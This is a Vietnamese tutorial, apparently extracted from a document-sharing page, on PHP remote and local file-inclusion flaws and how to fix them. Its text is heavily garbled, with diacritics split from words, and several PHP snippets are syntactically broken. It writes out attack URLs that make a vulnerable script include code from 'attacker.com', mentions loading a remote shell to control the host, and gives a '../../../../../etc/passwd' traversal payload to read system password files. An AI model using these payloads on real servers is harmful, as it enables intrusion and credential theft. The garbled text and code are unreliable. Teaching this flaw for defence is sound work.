Bảo mật máy chủ web: Lỗi Include và cách khắc phục
B o m t máy ch web: L i Include và cách kh c ph cả ậ ủ ỗ ắ ụ
Đôi khi vào các trang hacker , b n hay th y các l i b o m t mà hacker đã ạ ấ ỗ ả ậ
dùng nh ng cách th c h t s c đ n gi n đ l y username và password vào ữ ứ ế ứ ơ ả ể ấ
root c a host nh ../../../../../ ect/passwd. Đó chính là m t ph n c a l i ủ ư ộ ầ ủ ỗ
include. Nói m t cách t ng quát, l i include là m t lo i l i do s b t c n ộ ổ ỗ ộ ạ ỗ ự ấ ẩ
khi l p trình gây ra và l i này có th kh c ph c m t cách d dàng.ậ ỗ ể ắ ụ ộ ễ
Include là gì? Include nghĩa là k t n i, lien k t .ế ố ế Đ tránh vi c l p đi l p l iể ệ ặ ặ ạ
m t đo n mã nào đó, l p trình viên ch c n dùng l nh include đ n m t file ộ ạ ậ ỉ ầ ệ ế ộ
có ch a mã s n . Vì th , trong m t mã ngu n ( tin t c, di n đàn, âm ứ ẵ ế ộ ồ ứ ễ
nh c…) có ch a r t r t nhi u các l nh Include. Và trong hàng ngàn dòng ạ ứ ấ ấ ề ệ
l nh thì sai sót nh ng n i không m y quan tr ng là đi u không th tránh.ệ ở ữ ơ ấ ọ ề ể
D a vào hình th c chúng ta có th phân ra 2 lo i: remote file và local.ự ứ ể ạ
I. L i remote fileỗ
a/ L i khai báo bi n:ỗ ế
Vd1: Ta có m t fileộ exam1.php nh sau:ư
$mkdir=”/home”;
Include($mkdir/config.php);
[…code exam1.php] ?>
Ta th y r ng file này không có l i. Tr c tiên l p trình viên (LTV) khai báo ấ ằ ỗ ướ ậ
bi n $mkdir là “/home”. Sau đó LTV dùng l nh include v i đ ng d n đ n ế ệ ớ ườ ẫ ế
file config.php là giá tr đã khai báo bi n $mkdir.ị ở ế
Vd2: Tôi l i có m t fileạ ộ exam2.php nh sau:ư
$mkdir =” “;
Include($mkdir/config.php);
[…code exam2.php] ?>
Đã có l i x y ra. Vì fileỗ ả config.php n m chung m t th m c v i ằ ộ ư ụ ớ
file exam2.php nên không c n khai báo bi n $mkdir. Bi n $mkdir đã khôngầ ế ế
còn có tác d ng và tr nên vô nghĩa. Tuy nhiên LTV l i quên không xoá đi ụ ở ạ
mà l i đ nó t n t i.ạ ể ồ ạ
Vd3 Quay l i vd 1ạ
$mkdir = “/home”;
Include($mkdir/config.php);
[…code exam1.php] ?>
Gi s tôi có file config.php nh sau:ả ử ư
$datatype =”mysql”;
$datahost =”localhost”;
$data.user =”admin”;
$data.name =”test”; ?>
File exam1.php đã include đ n file config.php. V i l nh include này thì hai ế ớ ệ
file trên s t ng đ ng v i 1 file nh sau:ẽ ươ ươ ớ ư
$datatype =”mysql”;
$datahost =”localhost”;
$data.user =”admin”;
$data.name =”test”;
[…code exam1.php] ?>
đây đo n t $mkdir=…config.php ; đã đ c thay b ng n i dung file Ở ạ ừ ượ ằ ộ
config.php
Vd4: Quay l i v i vd2,ạ ớ exam2.php:
$mkdir =” “;
include($mkdir/config.php);
[…code exam2.php]
?>
File này có l i. Bi n $mkdir đ tr ng không khai báo. Đi u này đã t o c ỗ ế ể ố ề ạ ơ
h i cho attacker khai báo dùm.ộ
N u attacker dùng đ a ch nh sau:ế ị ỉ ư http://victim.com/exam2.php?
mkdir=http://attacker.com.
File exam2.php c a victim lúc này s nh sau:ủ ẽ ư
$mkdir= “http://attacker.com”;
Include (http://attacker.com/config.php);
[…code exam2.php] ?>
Trong tr ng h p này thì file config.php đã nghi m nhiên đ c coi nh là ườ ợ ễ ượ ư
n m trong host c a attacker và n u n i dung file này là m t con remview thìằ ủ ế ộ ộ
s có v n đ x y ra. Nh vd3 đã nói v i l nh include này, toàn b mã c a ẽ ấ ề ả ư ớ ệ ộ ủ
file ch a remview đã n m g n trong file exam2.php. Nh v y là attacker đã ứ ằ ọ ư ậ
dùng remview đ đi u khi n toàn b host c a victim.ể ề ể ộ ủ
Tuy nhiên vi c này ch x y ra máy attacker, còn nh ng ng i truy c p ệ ỉ ả ở ữ ườ ậ
khác đ u không có tác d ng và th c ch t fileề ụ ự ấ exam2.php trên host victim
cũng không h b thay đ i.ề ị ổ
b/ L i khi dùng hàm isset và hàm ifỗ
Vd5 Ta có m t fileộ exam5.php nh sau:ư
If (!$mkdir) ($mkdir=”config.php”)
Include($mkdir);
[…code exam5.php]
?>
Nghĩa là n u bi n $mkdir ch a đ c khai báo thì l y giá tr m c đ nh là ế ế ư ượ ấ ị ặ ị
config.php và include đ n giá tr mà bi n $mrdir đã khai báo.ế ị ế
T ng t nh vd4 attacker l i khai báo dùm bi n $mkdir cho victim và …ươ ự ư ạ ế
Vd6 : L i m t fileạ ộ exam6.php
Isset (!$patch) ($patch=”/home”);
Include($patch);
[…code exam6.php]
?>
N u bi n $patch ch a đ c khai báo thì l y giá tr m c đ nh là /homeế ế ư ượ ấ ị ặ ị
Bây gi đ n l t các b n t tìm hi uờ ế ượ ạ ự ể
II. L i localỗ
Chúng ta ch xét m t tr ng h p duy nh t ;ỉ ộ ườ ợ ấ exam.php:
$file =” “;
Include (/home/$file);
[…code exam.php]
?>
V n t ng t nh sau các ví d tr c nh ng ch khác ch bi n $file đã ẫ ươ ự ư ụ ướ ư ỉ ở ỗ ế
b gi i h n n m trong th m c home.ị ớ ạ ằ ư ụ
N u attacker nh p vào:ế ậ
http://victim.com/exam.php?file=http://attacker.com thì code trên thành nh ư
sau :
File =”http://attacker.com”) ;
Include (/home/http://attacker.com);
[…code exam.php]
?>
L nh include không còn có ý nghĩa vì đ ng d n sai hoàn toàn. Nh ng ệ ườ ẫ ư
attacker v n t n d ng đ c l i này. B ng cách thêm vào đ ng d n nh ầ ậ ụ ượ ỗ ằ ườ ẫ ư
sau :
http://victim.com/exam.php?file=../../../../../etc/passwd/
V i giá tr nh p vào là ../ attacker đã xhayj ng c ;liên k t đ n th m c ớ ị ậ ượ ế ế ư ụ
password c a server host .ủ
Vd: chúng ta có cài th m c nh sau:ư ụ ư
Server root/home/victim/public.html/forum/includes/exam.php
V i 5 l n s d ng ../ đã giúp attacker xâm nh p vào th m c etc/passwd : ớ ầ ử ụ ậ ư ụ
n i ch a pass vào root c a server.ơ ứ ủ
Tuỳ m i server mà có đ ng d n khác nhau mà dùng s l n ../ khác nhau.ỗ ườ ẫ ố ầ
III. Cách kh c ph cắ ụ
Đây là l i sinh ra do vô ý ho c do kém hi u bi t v l p trình. Tuy nhiên ỗ ặ ể ế ề ậ
vi c fix l i l i r t d dàng, ch c n lo i b các bi n không c n thi t khi ệ ỗ ạ ấ ễ ỉ ầ ạ ỏ ế ầ ế
dùng l nh include ho c ph i khai báo bi n rõ ràng. Qua l i này, chúng ta cóệ ặ ả ế ỗ
th t b o m t cho chính website c a b n than và t tìm ki m các l i khác.ể ự ả ậ ủ ả ự ế ỗ
có thể bạn quan tâm
Một số cách khắc phục window
15
932
287
Cơ sở dữ liệu
15
(New)
Cách khắc phục MBR từ Ubuntu
7
1.033
232
Cơ sở dữ liệu
7
(New)
Cách khắc phục lỗi treo máy tính
6
783
178
Tài liệu CNTT khác
6
(New)
Cách khắc phục lỗi kết nối MTP trên Window 10
6
1.062
263
Cơ sở dữ liệu
6
(New)
Vấn đề thường gặp trong Photoshop và cách khắc phục cơ bản
13
1.229
290
Đồ họa, thiết kế
13
(New)
Hướng dẫn cách khắc phục các vấn đề liên quan đến thẻ nhớ
7
789
229
Tài liệu CNTT khác
7
(New)
Hướng dẫn cách khắc phục khi Facebook bị dính virus
8
805
179
An ninh, bảo mật
8
(New)
Tổng hợp những lỗi kết nối mạng thường gặp và cách khắc phục
3
750
304
Tài liệu CNTT khác
3
(New)
thông tin tài liệu
Đôi khi vào các trang hacker , bạn hay thấy các lỗi bảo mật mà hacker đã dùng những cách thức hết sức đơn giản để lấy username và password vào root của host như ../../../../../ ect/passwd. Đó chính là một phần của lỗi include. Nói một cách tổng quát, lỗi include là một loại lỗi do sự bất cẩn khi lập trình gây ra và lỗi này có thể khắc phục một cách dễ dàng
Mở rộng để xem thêm
từ khóa liên quan
tài liệu mới trong mục này
tài liệu hot trong mục này
tài liệu giúp tôi
Nếu bạn không tìm thấy tài liệu mình cần có thể gửi yêu cầu ở đây để chúng tôi tìm giúp bạn!
×
